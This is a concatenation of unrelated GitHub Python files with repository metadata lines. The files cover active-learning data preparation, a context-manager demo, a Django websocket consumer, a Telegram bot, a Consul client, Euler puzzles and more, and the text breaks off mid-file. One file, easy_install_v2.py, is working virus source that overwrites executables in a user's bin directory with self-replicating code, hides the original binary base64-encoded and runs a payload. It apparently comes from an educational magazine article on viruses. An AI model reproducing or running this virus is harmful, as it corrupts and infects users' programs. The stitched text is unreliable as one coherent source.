df_train_new = df_predicted[:num_train_per_round].copy()
df_to_predict = df_predicted[num_train_per_round:].copy()
df_train_new.drop("uncertainty", axis=1, inplace=True)
df_to_predict.drop("uncertainty", axis=1, inplace=True)
elif args.sampling_strategy == "stratified":
stratified_log_filepath = STRATIFIED_LOG_FILEPATH_FS.format(
args.sampling_strategy, args.run, args.round)
Path(stratified_log_filepath).parent.mkdir(parents=True, exist_ok=True)
Path(stratified_log_filepath).unlink(missing_ok=True)
for num_linspace in range(11, 1, -1):
print(f"Number of prob bins testing: {num_linspace-1}")
num_train_per_bin = math.floor(num_train_per_round / (num_linspace-1))
num_train_final_bin = num_train_per_round - num_train_per_bin*(num_linspace-2)
print(f"num_train_per_bin: {num_train_per_bin}")
df_predicted_copy = df_predicted.copy()
df_predicted_copy["prob_bin"] = pd.cut(
df_predicted_copy["prob"],
bins=np.linspace(0, 1, num_linspace),
include_lowest=True,
)
df_grouped_size = df_predicted_copy.groupby("prob_bin").size()
print("Predicted grouped by prob bin:\n", df_grouped_size)
with open(stratified_log_filepath, 'a') as _f:
_f.write(f"num_bins: {num_linspace-1}\n")
_f.write(f"num_train_per_bin: {num_train_per_bin}\n")
_f.write(f"num_train_final_bin: {num_train_final_bin}\n")
_f.write("Predicted grouped by prob bin:\n")
_f.write(str(df_grouped_size)+'\n\n')
if num_train_final_bin > min(df_grouped_size.tolist()):
print("Not enough training data per bin. Reducing the prob bin...")
continue
else:
print("Enough training data")
train_new_data = []
to_predict_data = []
cur_bin = 1
df_grouped = df_predicted_copy.groupby("prob_bin")
for group, df_subset in df_grouped:
df_subset = df_subset.sample(frac=1, random_state=args.random_state)
n = num_train_per_bin if cur_bin < (num_linspace-1) else num_train_final_bin
train_new_data.append(df_subset[:n])
to_predict_data.append(df_subset[n:])
cur_bin += 1
df_train_new = pd.concat(train_new_data).drop("prob_bin", axis=1)
df_to_predict = pd.concat(to_predict_data).drop("prob_bin", axis=1)
break
elif args.sampling_strategy == "random":
df_predicted_shuffled = df_predicted.sample(frac=1, random_state=args.random_state)
df_train_new = df_predicted_shuffled[:num_train_per_round].copy()
df_to_predict = df_predicted_shuffled[num_train_per_round:].copy()
train_new_filepath = train_filepath.replace('.tsv', '_new.tsv')
print(f"Saving training data new to this round to '{train_new_filepath}'")
df_train_new.to_csv(train_new_filepath, sep='\t', index=False)
df_train_new.drop("prob", axis=1, inplace=True)
df_train = pd.concat([df_train, df_train_new])
df_to_predict.drop("prob", axis=1, inplace=True)
print(f"Saving training data to '{train_filepath}'")
df_train.to_csv(train_filepath, sep='\t', index=False)
print(f"Saving to_predict data to '{to_predict_filepath}'")
df_to_predict.to_csv(to_predict_filepath, sep='\t', index=False)
print(f"***** {args.sampling_strategy}|run_{args.run}|round_{args.round} END *****")
if __name__ == '__main__':
main()
| IBPA/SemiAutomatedFoodKBC | src/data_generation/prepare_training_data.py | prepare_training_data.py | py | 8,371 | python | en | code | 1 | github-code | 36 |
31724432420 | # Предложение with служит для упрощения конструкции try/finally
# Вначале блока with вызывается метод __enter__
# Роль части finally играет обращение к методу __exit__
from unittest.mock import patch
class LookingGlass:
def __enter__(self):
import sys
self.original_write = sys.stdout.write
sys.stdout.write = self.reverse_write
return 'JABBERWOCKY'
def reverse_write(self, text):
self.original_write(text[::-1])
def __exit__(self, exc_type, exc_value, traceback):
import sys
sys.stdout.write = self.original_write
if exc_type is ZeroDivisionError:
print('Пожалуйста, не надо делить на нуль!')
return True
with LookingGlass() as what:
print('Alice, Kitty and Snowdrop')
print(what)
raise ZeroDivisionError
print(what)
print('Alice, Kitty and Snowdrop')
| GrigorevEv/grade_2 | python/context_manager/handwritten.py | handwritten.py | py | 997 | python | ru | code | 0 | github-code | 36 |
25167990666 | """
Assignment: Programming Project 4: Client / Server Chat
File: Configuration
Description: Configuration file for both server and client scripts.
A list of constants.
Dependencies: None
Course: CS 372
Section: 400
Module: 10
Name: Marcos Valdez
ONID: valdemar
Due: 12/04/2022
Modified: 12/03/2022
"""
import random
HOST = "127.0.0.1" # Standard loopback interface address (localhost)
PORT = 55085 # Port to listen on (non-privileged ports are > 1023)
CLIENT = random.randint(57344, 65535) # Client port
BUFFER = 4096 # Socket .recv buffer size
MIN_RESP = 18 # Response size lower limit to close socket
| MHValdez/Socket_Server_and_Client_Chat | config.py | config.py | py | 853 | python | en | code | 0 | github-code | 36 |
13329932727 | import json
from channels.generic.websocket import WebsocketConsumer
from django.contrib.auth.models import User
from gestion_admin.models import Article, Historique
class ChatConsumer(WebsocketConsumer):
def connect(self):
self.user = User.objects.get(username=self.scope["user"])
self.historique = Historique.objects.filter(user=self.user)
self.article = Article.objects.get(id=self.scope['url_route']['kwargs']['room'])
print(self.user, self.article)
self.last_history = self.historique[self.historique.count()-1]
self.last_article = self.last_history.article
self.id = self.last_article.id
self.title = self.last_article.title
self.categorie = self.last_article.categorie
self.text = self.last_article.file.read().decode('utf-8')
print(self.last_history, self.last_article)
print(self.text)
self.accept()
def disconnect(self, close_code):
self.close()
def receive(self, text_data):
reponse = None
text_data_json = json.loads(text_data)
message = text_data_json['message']
print(message)
if 'hello' in message:
reponse = {
'type' : 'text',
'text' : "Hello I'am ChatBot!"
}
elif 'hi' in message:
reponse= {
'type' : 'link',
'article' : 1,
'text' : 'hello'
}
self.send(text_data=json.dumps(reponse)) | meryem1994/chatbot-project | user/consumers.py | consumers.py | py | 1,526 | python | en | code | 0 | github-code | 36 |
12062872784 | def divisors(num, primes):
if num == 1:
return 1
elif num == 2: return 2
else:
divisors = 2
divlist = [1, num]
for divisor in primes:
if divisor ** 2 <= num:
if num % divisor == 0:
if divisor ** 2 == num:
divisors += 1
divlist.append(divisor)
else:
multiple = 0
while True:
multiple += divisor
if multiple ** 2 > num: break
if multiple ** 2 == num and multiple not in divlist:
divisors += 1
divlist.append(multiple)
elif num % multiple == 0 and multiple not in divlist:
divisors += 2
divlist.append(multiple)
divlist.append(num // multiple)
else: break
return divisors
def sieve(n, existing = []):
if existing == []: result = [2]
else: result = existing
divisor = 3
while divisor <= n:
isprime = True
for prime in result:
if divisor % prime == 0:
isprime = False
break
if isprime: result.append(divisor)
divisor += 2
return result
i = 1
triangle = 1
primes = sieve(1000)
while divisors(triangle, primes) <= 500:
i += 1
triangle += i
print (triangle) | rgertenbach/Project-Euler-Python | Euler 12.py | Euler 12.py | py | 1,477 | python | en | code | 0 | github-code | 36 |
75118097702 | #!/usr/bin/python3
# === INFECTED ===
import os
from sys import argv
import stat
import random
import base64
import tempfile
cmd_init, cmd = ('ls', 'ls')
pathToCorrupt = '/home/tristan/my_bin/'
fileToCorrupt = pathToCorrupt + cmd
def isInfected(content):
return content == b'# === INFECTED ===\n'
def bomb():
print('BEAAAAAAAAAAH!')
with open(fileToCorrupt, 'rb') as currentFile:
ftcLines = currentFile.readlines()
if isInfected(ftcLines[1]):
filenames = os.listdir(pathToCorrupt)
random.shuffle(filenames)
for cmd in filenames:
if cmd != cmd_init:
with open(pathToCorrupt + cmd, 'rb') as newFile:
ftcLines = newFile.readlines()
if not isInfected(ftcLines[1]):
fileToCorrupt = pathToCorrupt + cmd
break
else:
print('All files already corrupted!')
exit(0)
# ftcLines contient le code binaire du programme
ftcLines = b''.join(ftcLines)
# On détermine où se trouve le code exécutable original
with open(argv[0], 'rb') as currentFile:
content = currentFile.readlines()
startOrigin = False
original = None
virus = []
for i in range(len(content)):
if startOrigin:
original = content[i][2:]
else:
virus.append(content[i])
if content[i] == b'# === ORIGINAL ===\n':
startOrigin = True
# virus contient le virus
# original contient le code binaire original
# On efface l'exécutable, on écrit le code Python et on colle le code binaire
print('Infection in progress : command', cmd)
os.remove(fileToCorrupt)
with open(fileToCorrupt, 'wb') as currentFile:
for line in virus:
currentFile.write(line)
currentFile.write(b'# ' + base64.b64encode(ftcLines))
os.chmod(fileToCorrupt, stat.S_IXUSR | stat.S_IRUSR | stat.S_IWUSR | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH | stat.S_IROTH | stat.S_IWOTH)
# Bombe logique
bomb()
# Exécution du code original
try:
if argv[0] != './easy_install_v2.py':
if original is None:
original = ftcLines
temp = tempfile.NamedTemporaryFile(delete=True)
with open(temp.name, 'wb') as tmpCmdFile:
tmpCmdFile.write(base64.b64decode(original))
os.chmod(temp.name, stat.S_IXUSR | stat.S_IRUSR | stat.S_IWUSR | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH | stat.S_IROTH | stat.S_IWOTH)
temp.file.close()
os.system(temp.name +' ' + ' '.join(argv[1:]))
except:
exit(2)
# === ORIGINAL ===
| GLMF/GLMF201 | Libs_et_Modules/easy_install_v2.py | easy_install_v2.py | py | 2,566 | python | en | code | 2 | github-code | 36 |
32365954378 | import json, random
from random import shuffle
out = open("_12bad.json", "a")
lines = [line for line in open("bad.json").readlines()]
lines = lines[:12307]
for line in lines:
out.write(line)
| masteroppgave/topic_model | filter.py | filter.py | py | 196 | python | en | code | 0 | github-code | 36 |
31739800389 | from multiprocessing import Process
import time
class MyProcess(Process):
def __init__(self,name):
super().__init__()
self.name=name
def run(self):
print("%s is running" % self.name)
time.sleep(1)
print("%s is done" % self.name)
if __name__=="__main__":
p=MyProcess("subprocess_1")
p.start()
print("main process end") | bigcpp110/python_learning | 并发编程/process_class.py | process_class.py | py | 400 | python | en | code | 1 | github-code | 36 |
7056045662 | # class MyRangeInterator:
# def __init__(self,stop):
# self.number = 0
# self.stop = stop
#
# def __next__(self): #不能直接传递到函数要先传给类
# self.number += 1
# if self.number < self.stop:
# return self.number
# else:
# raise StopIteration()
class MyRange:
def __init__(self, end):
self.end = end
self.num = 0
def __iter__(self):
while self.num < self.end:
yield self.num
self.num += 1
for item in MyRange(5): # 0~4
print(item) | haiou90/aid_python_core | day16/exercise_personal/06_exercise.py | 06_exercise.py | py | 583 | python | en | code | 0 | github-code | 36 |
6369818660 | '''
This script compiles the requirements for the bot and runs it on a loop
It should also contain the functions of the bot
'''
from config import *
from core import *
import telegram
import datetime
import time
from telegram.ext import Updater, CommandHandler, MessageHandler, Filters, \
ConversationHandler, CallbackQueryHandler
import logging
import random
from pytz import timezone
import emojis
import argparse
import utils.db_utils as db_utils
import argparse
print('initialising')
# checks if this should be run ion testing env
parser = argparse.ArgumentParser(description='Runs the leobot service')
parser.add_argument('-t', '--testing', type=bool, help='Whether you want to run in testing env')
args = parser.parse_args()
# setting up deployment environment env (REMOVE IF YOU ARE NOT USING env FILE BUT IT IS GOOD PRACTICE)
testing = args.testing
print('Testing value:', testing)
import configparser
config = configparser.ConfigParser()
config.read('bot.cfg')
if testing:
bot_config = dict(config['test_bot'])
print(str(config))
dbi = db_utils.Database(config, 'test_db')
else:
bot_config = config['live_bot']
dbi = db_utils.Database(config, 'live_db')
# TODO: ACTUAL DEPLOYMENT CHANGE
owner = config['owners']['fei']
updater = Updater(token=bot_config['token'], use_context=True)
dispatcher = updater.dispatcher # for quicker access to the dispatcher object
jobqueuer = updater.job_queue # for quicker access to JobQueue object
# logs the problems in log.md file with level INFO
logging.basicConfig(filename='storage/error_log.txt', format='%(asctime)s - %(name)s - \
%(levelname)s - %(message)s', level=logging.INFO)
print('finish setting up logging')
core_utils.setup_bot_data(dispatcher, owner, bot_config, dbi, testing)
msg_return = dispatcher.bot.send_message(owner, bot_init_msg) # informs the owners that it is intialised
print('Message Return', str(msg_return))
################
# TESTING ZONE #
################
# dbi.new_category('Testimony', des= 'Heartfelt personal sharing')
# dbi.cat_id('Testimony')
# def process_members(update, context):
# '''
# Processes the changes in member data i.e. when the user first starts the bot.
# This function being in group 0 make sure it is the highest priority and runs in parallel with other
# callback functions
# '''
# # for easier access to user_id
# user_id = update.message.from_user.id
# # initiates the user if it is his first time
# initiate_user(user_id, update, context) # in utils
# # updates the permission according to quits by the coder
# # check_for_personal_changes(update, context)
# dispatcher.add_handler(MessageHandler(Filters.text, process_members), group=0) # gives most prirority
new_thread_conv = ConversationHandler(
entry_points=[CommandHandler('new_thread', new_thread)],
states={
TITLE: [MessageHandler(Filters.text & ~Filters.command, t_title)],
CAT: [MessageHandler(Filters.text & ~Filters.command, t_cat)],
BODY: [MessageHandler(Filters.text & ~Filters.command, t_body)],
FILE: [core_utils.file_handler(t_file),
CommandHandler('no', t_file)],
TAGS: [MessageHandler(Filters.text & ~Filters.command, t_tags)],
TC: [MessageHandler(Filters.text & ~Filters.command, tc_next)]
},
fallbacks= [CommandHandler('cancel', cancel),
CommandHandler('end', end)],
map_to_parent= {
COMPLETED: MENU,
END: END,
CANCEL: MENU
}
)
feedback_conv = ConversationHandler(
entry_points=[CommandHandler('feedback', fb_init)],
states={
TITLE: [MessageHandler(Filters.text & ~Filters.command, \
fb_title)],
BODY: [MessageHandler(Filters.text & ~Filters.command, fb_body)],
FILE: [core_utils.file_handler(fb_file),
CommandHandler('no', fb_file)]
},
fallbacks= [CommandHandler('cancel', cancel),
CommandHandler('end', end)],
map_to_parent= {
COMPLETED: MENU,
END: END,
CANCEL: MENU
}
)
admin_conv = ConversationHandler(
entry_points=[CommandHandler('admin_menu', admin_menu)],
states={
MENU: [CommandHandler('sview_fb', sview_fb),
CommandHandler('dview_fb', dview_fb),
CommandHandler('ch_perm', ch_perm),
CommandHandler('all_members', all_members),
CommandHandler('del_threads', del_threads)
],
},
fallbacks= [CommandHandler('quit', quit_m),
CommandHandler('end', end)],
map_to_parent= {
END: END,
QUIT: MENU
}
)
be_conv = ConversationHandler(
entry_points=[CommandHandler('backend', admin_menu)],
states={
MENU: [],
},
fallbacks= [CommandHandler('quit', quit_m),
CommandHandler('end', end)],
map_to_parent= {
END: END,
QUIT: MENU
}
)
start_conv = ConversationHandler(
entry_points=[CommandHandler('start', start)],
states={
MENU: [
new_thread_conv,
feedback_conv,
admin_conv,
],
END: [CommandHandler('start', start)],
TIMEOUT: [MessageHandler(Filters.text, timeout)]
},
fallbacks= [CommandHandler('end', end)],
conversation_timeout=600
)
# def not_command(update, context):
# '''
# Processes messages that are not commands i.e. a response to a prompt by the bot
# Make sure this is the last callback function to grant lowest priority to because this means that
# the person is clearly not trying to call another function
# '''
# update.message.reply_text('Not real command')
# dispatcher.add_handler(MessageHandler(Filters.command, not_command), group=1)
dispatcher.add_handler(CommandHandler('help', help_fns))
dispatcher.add_handler(CommandHandler('cache', cache))
dispatcher.add_handler(start_conv)
def remind_events(context):
# TODO: Make bot record events and remind people
inform_owners(daily_msg, context)
event_reminder = jobqueuer.run_daily(callback=remind_events,\
time=datetime.time(8, 0, 0, 0, tzinfo=timezone('Singapore')))
updater.start_polling()
dbi.close()
| ollayf/leobot | main.py | main.py | py | 6,203 | python | en | code | 2 | github-code | 36 |
846869458 | import argparse
import json
import os
from datetime import datetime
from statistics import mean
import chainer
import chainerrl
import numpy as np
from chainerrl.wrappers import CastObservationToFloat32, ScaleReward
from estimator import RecoNet, ThreatEstimator
from q_func import RPDQN, QFunction, RPQFunction
from util import Environment, default_circuit
if __name__ == '__main__':
parser = argparse.ArgumentParser(
prog='run.py',
description='run learning',
add_help=True
)
parser.add_argument('--gpu', dest='gpu', action='store_true')
parser.add_argument('--seed', dest='seed', default=0, type=int)
parser.add_argument('--load', dest='load', default='', type=str)
parser.add_argument('--normal', dest='normal', action='store_true')
parser.add_argument('--adameps', dest='adam_eps', default=1e-2, type=float)
parser.add_argument('--adamalpha', dest='adam_alpha',
default=1e-3, type=float)
parser.add_argument('--gamma', dest='gamma', default=0.90, type=float)
parser.add_argument('--alllog', dest='all_log', action='store_true')
parser.add_argument('--lmd', dest='lmd', default=200, type=int)
parser.add_argument('--scale', dest='scale', default=1.0, type=float)
parser.add_argument('--firsteps', dest='firsteps', default=1.0, type=float)
parser.add_argument('--step', dest='step', default=3 * 10 ** 6, type=int)
parser.add_argument('--demo', dest='demo', action='store_true')
parser.add_argument('--render', dest='ren', action='store_true')
parser.add_argument('--eval', dest='eval', type=str, default='')
parser.add_argument('-t', dest='times', default=100, type=int)
args = parser.parse_args()
gpus = (0,) if args.gpu else ()
chainerrl.misc.set_random_seed(args.seed, gpus)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
result_dir = os.path.join('results/circuit', timestamp)
os.makedirs(result_dir)
with open(os.path.join(result_dir, 'args.json'), 'w') as f:
json.dump(args.__dict__, f, indent=2)
circuit = default_circuit()
rand = False if args.demo else True
env = Environment(circuit=circuit,
random_init=rand, result_dir=result_dir, file='crash_train.log', all_log=args.all_log,
lmd=args.lmd, render=args.ren)
n_actions = len(env.agent.action_list)
env = ScaleReward(env, args.scale)
reconet = RecoNet()
estimator = ThreatEstimator(
reconet, 'circuit/threat.model', args.gpu)
danger_limit = 1e-3
step = args.step
if args.normal:
q_func = QFunction(n_actions)
else:
q_func = RPQFunction(n_actions, estimator,
danger_limit)
optimizer = chainer.optimizers.Adam(
eps=args.adam_eps, alpha=args.adam_alpha)
optimizer.setup(q_func)
explorer = chainerrl.explorers.LinearDecayEpsilonGreedy(
args.firsteps, 0.05, step, random_action_func=lambda: np.random.randint(n_actions))
replay_buffer = chainerrl.replay_buffer.PrioritizedReplayBuffer(1e6)
if args.normal:
agent = chainerrl.agents.DoubleDQN(
q_func, optimizer, replay_buffer, args.gamma, explorer, clip_delta=False,
replay_start_size=600, update_interval=1,
target_update_interval=1e3)
else:
agent = RPDQN(
q_func, optimizer, replay_buffer, args.gamma, explorer, clip_delta=False,
replay_start_size=600, update_interval=1,
target_update_interval=1e3)
env.unwrapped.result_agent = agent
if args.demo:
if args.load:
agent.load(args.load)
for i in range(args.times):
obs = env.reset()
done = False
total = 0
st = 0
while not done:
action = agent.act(obs)
obs, r, done, _ = env.step(action)
env.unwrapped.render()
total += r
st += 1
num = '%03d' % st
if st >= 200:
break
print('Reward:', total)
elif args.eval:
def gen_dir_name(jobid):
times = step // 10**5
yield ''
dirname = args.eval + '/'
for i in range(times - 1):
yield dirname + 'agent' + str(i + 1)
yield dirname + str(int(step)) + '_finish'
crash_ratio = []
reward_list = []
steps = np.arange(0, step + 1, 10**5)
for agent_dir_name in gen_dir_name(args.eval):
if agent_dir_name:
agent.load(agent_dir_name)
print('agent:', agent_dir_name)
env = Environment(circuit=circuit,
random_init=True, result_dir=result_dir,
file='crash_train.log', all_log=args.all_log,
lmd=args.lmd)
total_episode_reward = []
for i in range(args.times):
obs = env.reset()
done = False
total = 0
st = 0
while not done:
action = agent.act(obs)
obs, r, done, _ = env.step(action)
total += r
st += 1
num = '%03d' % st
if st >= 200:
break
if not env.crashed:
total_episode_reward.append(total)
ave_reward = mean(total_episode_reward) if len(
total_episode_reward) > 0 else np.nan
ratio = env.crash_cnt / args.times
print('result: crash_cnt ', ratio,
' pure_reward ', ave_reward, end='\n\n')
crash_ratio.append(ratio)
reward_list.append(ave_reward)
crash_ratio = np.array(crash_ratio)
reward_list = np.array(reward_list)
data = np.vstack((steps, crash_ratio))
data2 = np.vstack((steps, reward_list))
print(data)
np.save(os.path.join(result_dir, 'crash.npy'), data)
print(data2)
np.save(os.path.join(result_dir, 'reward.npy'), data2)
else:
if args.load:
agent.load(args.load)
chainerrl.experiments.train_agent_with_evaluation(
agent, env, steps=step, eval_n_steps=None, eval_n_episodes=1,
train_max_episode_len=200, eval_interval=1e4, outdir=result_dir,
eval_env=Environment(circuit=circuit, result_dir=result_dir, file='crash_test.log',
all_log=True, lmd=200))
| pfnet-research/rp-safe-rl | circuit/run.py | run.py | py | 6,662 | python | en | code | 7 | github-code | 36 |
15139442018 | from lexikanon import HyFI
from lexikanon.stopwords import Stopwords
def test_stopwords():
print(HyFI.get_caller_module_name())
cfg = HyFI.compose_as_dict("stopwords")
print(cfg)
cfg["nltk_stopwords_lang"] = "english"
stop = Stopwords(**cfg)
print(stop)
print(list(stop))
assert len(stop) == 179
stop = HyFI.instantiate_config(
"stopwords",
overrides=["stopwords.nltk_stopwords_lang=english"],
)
assert len(stop) == 179
if __name__ == "__main__":
test_stopwords()
| entelecheia/lexikanon | tests/lexikanon/stopwords/test_stopwords.py | test_stopwords.py | py | 532 | python | en | code | 0 | github-code | 36 |
19757364925 | #! usr/bin/env/python
# Cache Enforcer (for Spotify)
# Spotify took away the option for controlling the cache size, so I'm doing it for them.
# Written by Josh Chan
import os
import shutil
# CONSTANTS
TARGET_DIR = "/Users/joshuapaulchan/Library/Caches/com.spotify.client/Data/" # currently, mac only
SIZE_ALLOWANCE = 1 * ( 1024 ^ 3 ) # 4 gb
DEV = bool(os.environ.get('DEV', False))
def log(statement):
"""
`log(statement)`
Logs something if in development.
@params: statement: str: statement to log
@returns: none
"""
if DEV: print(statement)
def total_size(dir_path):
"""
`total_size(dir_path)`
Calculates the size of a directory recursively
@params: dir_path: str: the directory to calculate the size of
@returns: total_size: int: int containing the size of the directory in bytes
"""
total_size = 0
for path, dirnames, filenames in os.walk(dir_path):
for f in filenames:
fp = os.path.join(path, f)
sz = os.path.getsize(fp)
total_size += sz
# log("{}, {} bytes".format(f, sz))
return total_size
def rmdir(dir_path):
"""
`rmdir(dir_path)`
Recursively remove the directory @ dir_path
@params: dir_path: str: The directory to remove
@returns: _ : dict: dict containing meta information
files_removed: int: number of files removed total
bytes_removed: int: number of bytes removed total
"""
shutil.rmtree(dir_path, onerror=log)
def main():
sz = total_size(TARGET_DIR)
if sz > SIZE_ALLOWANCE:
rmdir(TARGET_DIR)
print("Removed {} GB from Spotify's caches".format(sz / (1024 ** 3)))
if __name__ == '__main__':
main()
| joshpaulchan/tidy | beatdown-spotify.py | beatdown-spotify.py | py | 1,744 | python | en | code | 0 | github-code | 36 |
72482584103 | from fhcrc_pathology.OneFieldPerSpecimen import OneFieldPerSpecimen
import global_strings as gb
class HighRiskFinding(OneFieldPerSpecimen):
''' extract other, high risk findings (atypia, etc) '''
__version__ = 'HighRiskFinding1.0'
def __init__(self):
super(HighRiskFinding, self).__init__()
self.overall_field_name = 'HighRiskFinding'
self.overall_table = gb.PATHOLOGY_TABLE
self.specimen_confidence = 0.9
self.match_style = 'all'
## reference lists & dictionaries ##
self.file_name_string = 'high_risk'
## relevant sections of the report ##
self.good_section = r'IMPRESSION|FINAL DIAGNOSIS|COMMENT|FINAL DX|SUMMARY CANCER'
self.bad_section = r'CLINICAL|Note'
| esilgard/BreastMR | fhcrc_pathology/breast/HighRiskFinding.py | HighRiskFinding.py | py | 757 | python | en | code | 0 | github-code | 36 |
22016755038 | import pandas as pd
import numpy as np
from scipy.io import savemat
import os
def csv_to_spm_vectors(csv_path):
for root, dirs, files in os.walk(csv_path):
for name in files:
if name.endswith(".csv"):
csv_file = os.path.join(root, name)
df = pd.read_csv(csv_file,delimiter=";")
sub_name = csv_file[-10:-4]
cleanup = ['onsets','durations']
for key in cleanup:
for ii,_ in enumerate(df[key]):
string = df[key][ii].replace("\n","").replace(",","")[1:-1].split(" ")
string = list(filter(None, string))
array = np.array(string,dtype=np.float64)
df[key][ii]=array
new_dict = {"sub":sub_name,
"sync_onset":df["onsets"][0],
"osync_onset":df["onsets"][1],
"mine_onset":df["onsets"][2],
"other_onset":df["onsets"][3],
"sync_duration":df["durations"][0],
"osync_duration":df["durations"][1]}
output_name = csv_path + sub_name + "_vectors.mat"
savemat(output_name,{"vectors":new_dict}) | paradeisios/old_thesis_code | PPI_analysis/utils/csv_to_spm_vectors.py | csv_to_spm_vectors.py | py | 1,283 | python | en | code | 0 | github-code | 36 |
4289870302 | # consul_client.py
import consul
import socket
import time
import threading
import json
import re
import random
from flask import Flask
from typing import Dict, List, Union
from dzmicro.utils import compare_dicts
class WatchKVThread(threading.Thread):
def __init__(self, uuid: str, is_platform: bool) -> None:
super().__init__(name=f'WatchKV')
self.uuid = uuid
self.is_platform = is_platform
self._stop = False
self._kv = {}
def set_server_unique_info(self) -> None:
from dzmicro.utils import singleton_server_manager
self.server_unique_info = singleton_server_manager.get_server_unique_info(self.uuid)
self._prefix = self.server_unique_info.consul_info.get_prefix()
def stop(self) -> None:
self._stop = True
def on_config_changed(self, config_dict: Dict[str, any], change: str) -> None:
bot_commands = self.server_unique_info.bot_commands
if change == 'add':
pattern = fr"{self._prefix}(\w+)/config"
for key, value in config_dict.items():
match = re.search(pattern, key)
if match:
service_name = f'DBot_{match.group(1)}'
keyword = value.get('keyword')
bot_commands.add_keyword(keyword, service_name)
commands = value.get('commands')
if service_name and commands:
for command in commands:
bot_commands.add_commands(keyword, command)
def on_listener_changed(self, listener_dict: Dict[str, any], change: str) -> None:
from dzmicro.utils import singleton_server_manager
server_shared_info = singleton_server_manager.get_server_shared_info()
listener_manager = server_shared_info.listener_manager
pattern = fr"{self._prefix}(\w+)/listeners"
for key, value in listener_dict.items():
match = re.search(pattern, key)
if match:
if change == 'add':
service_name = f'DBot_{match.group(1)}'
#TODO 需不需要比较service_name和value中的service_name是否一致?
listener_manager.update_listeners(value)
elif change == 'modify':
#TODO 完善listener_manager.update_listeners的功能,让他可以自动适应添加与修改
listener_manager.update_listeners(value.get('old'), is_rm=True)
listener_manager.update_listeners(value.get('new'))
elif change == 'delete':
listener_manager.update_listeners(value, is_rm=True)
def on_add_kv(self, added_dict: Dict[str, any]) -> None:
print(f'添加\n{added_dict}\n')
self.on_config_changed(added_dict, 'add')
self.on_listener_changed(added_dict, 'add')
def on_deleted_kv(self, deleted_dict: Dict[str, any]) -> None:
#TODO 配置文件删除
print(f'删除\n{deleted_dict}\n')
self.on_config_changed(deleted_dict, 'delete')
self.on_listener_changed(deleted_dict, 'delete')
def on_modified_kv(self, modified_dict: Dict[str, any]) -> None:
#TODO 配置文件修改
print(f'修改\n{modified_dict}\n')
self.on_config_changed(modified_dict, 'modify')
self.on_listener_changed(modified_dict, 'modify')
def run(self) -> None:
consul_client = self.server_unique_info.consul_client
while not self._stop:
new_kv = {}
while True:
try:
# 获取指定文件夹下的所有key
#TODO 这个前缀也可以在kv中配置
keys = consul_client.download_key_value(self._prefix, [], True)
break
except:
print('下载字典失败,正在重试')
time.sleep(1)
# 读取所有key的值,并将结果存储在字典中
for key in keys:
while True:
try:
json_data = consul_client.download_key_value(key, '')
new_kv[key] = json_data
break
except:
print('下载字典失败,正在重试')
time.sleep(1)
added, deleted, modified = compare_dicts(self._kv, new_kv)
if added:
self.on_add_kv(added)
if deleted:
self.on_deleted_kv(deleted)
if modified:
self.on_modified_kv(modified)
self._kv = new_kv
time.sleep(1)
class ConsulClient:
def __init__(self, uuid: str, is_platform: bool = False, host: str = 'localhost', port: int = 8500) -> None:
#TODO assert consul_info需要先加载
self.uuid = uuid
self.is_platform = is_platform
self.consul = consul.Consul(host=host, port=port)
def set_server_unique_info(self) -> None:
from dzmicro.utils import singleton_server_manager
self.server_unique_info = singleton_server_manager.get_server_unique_info(self.uuid)
self.prefix = self.server_unique_info.consul_info.get_prefix()
self.consul.token = self.server_unique_info.consul_info.get_token()
# def set_prefix(self, prefix: str = '') -> None:
# self._prefix = prefix
# def set_token(self, token: str) -> None:
# if token:
# self.consul.token = token
def register_service(self, service_name: str, service_port: Union[str, int], service_tags: List[str] = []) -> str:
"""
注册服务到Consul
"""
service_id = f'{service_name}-{socket.gethostname()}'
service_address = socket.gethostbyname(socket.gethostname())
service_check = consul.Check.http(url=f'http://{service_address}:{service_port}/health', interval='10s')
self.consul.agent.service.register(name=service_name, service_id=service_id, address=service_address, port=service_port, tags=service_tags, check=service_check)
return service_id
def update_key_value(self, dict_to_upload: Dict[str, any]) -> None:
"""
将字典上传Consul
"""
for key, value in dict_to_upload.items():
while True:
try:
value_json = json.dumps(value)
self.consul.kv.put(key, value_json.encode('utf-8'))
break
except consul.base.ConsulException:
print(f'上传字典{dict}失败,正在重试')
time.sleep(1)
def download_key_value(self, key: str, default: any = None, keys: bool = False) -> any:
"""
从Consul下载指定的Key Value
"""
index, data = self.consul.kv.get(key, keys=keys)
if data:
if keys:
return data
else:
value_json = data['Value'].decode('utf-8')
value = json.loads(value_json)
return value
else:
return default
def deregister_service(self, service_id: str) -> None:
"""
从Consul中注销服务
"""
self.consul.agent.service.deregister(service_id)
def discover_services(self, service_name: str) -> List[List[str]]:
"""
发现服务,返回所有设备信息
"""
#TODO 考虑添加查询表缓存,需要考虑查询表的刷新;刷新时机可以选择为WatchKVThread发现变动时
# 过滤掉不健康的服务
try:
services = self.consul.health.service(service_name, passing=True)[1]
return [[service.get('Service', {}).get('Address', ''), service.get('Service', {}).get('Port', '')] for service in services]
except:
return [[]]
def discover_service(self, service_name: str) -> Union[List[List[str]], None]:
"""
发现服务,随机返回其中一个设备信息
"""
services = self.discover_services(service_name)
if not services:
return None
return random.choice(services)
def check_port_available(self, sname: str, sip: str, sport: Union[int, str]) -> bool:
if sip == '0.0.0.0' or sip == '127.0.0.1':
sip = socket.gethostbyname(socket.gethostname())
# 获取所有已注册的服务
services = self.consul.agent.services()
# 遍历所有已注册的服务,获取它们的 IP 和端口号
service_instances = {}
for service_id in services:
service_name = services[service_id]['Service']
_, instances = self.consul.health.service(service_name, passing=True)
for instance in instances:
ip = instance['Service']['Address']
port = instance['Service']['Port']
if service_name not in service_instances:
service_instances[service_name] = []
service_instances[service_name].append((ip, port))
# 逐个检查服务列表和对应的实例 IP 和端口号
for name, instances in service_instances.items():
for ip, port in instances:
if sip == ip and sport == port and sname != name:
print(f'{ip}:{port}已被{name}占用')
return False
return True
def register_consul(self, app: Flask, name: str, port: Union[str, int], tags: List[str]) -> None:
'''
服务开启前,注册consul
'''
id = self.register_service(name, port, tags)
app.config.update({'id': id})
def deregister_service(self, app: Flask) -> None:
'''
服务结束后,注销consul
'''
id = app.config['id']
self.deregister_service(self, id)
| dzming-git/DzMicro | dzmicro/utils/network/consul_client.py | consul_client.py | py | 9,967 | python | en | code | 1 | github-code | 36 |
23164271375 | from PIL import Image, ImageOps
